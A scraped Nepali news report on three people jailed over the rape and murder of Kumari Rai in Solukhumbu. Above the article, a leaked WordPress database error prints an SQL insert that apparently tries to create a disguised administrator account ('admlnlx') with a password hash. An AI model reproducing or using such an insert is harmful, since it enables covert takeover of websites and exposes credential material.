WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BegTVEEFaXE8q2hfOR0vPcIn5yrGTz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 15:36:29', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु / थुलुङ दुधकोशी गाउँपालिका ७ की कुमारी राईको बलात्कारपछि हत्या गरेको अभियोग लागेका ३ जना कारागार चलान भएका छन ।
जिल्ला अदालत सोलुखुम्बुले शुक्रबार ३ जनालाई पुर्पक्षको लागी थुनामा पठाउन आदेश दिएको हो ।
शुक्रबार नै उनीहरुलाई कारागार चलान गरिएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुका सुचना अधिकारी राम किशोर शाहले जानकारी दिए ।
मृतक राईको अनुहार, टाउँको र शरिरका विभिन्न भागमा चोट लागेको थियो । प्रहरीले आरोपित चरण राईलाई १२ गते घरबाटै पक्राउ गरिएको थियो भने भागिधन राईलाई १३ गते र युवराज खत्रीलाई १४ गते पक्राउ गरि अनुसन्धान सुरु गरिएको थियो । हत्यापछि युवराजले प्रयोग गरेको चप्पल र कपडा सोहि ठाउँमा छाडेर भागेको समेत प्रहरीले जनाएको छ । .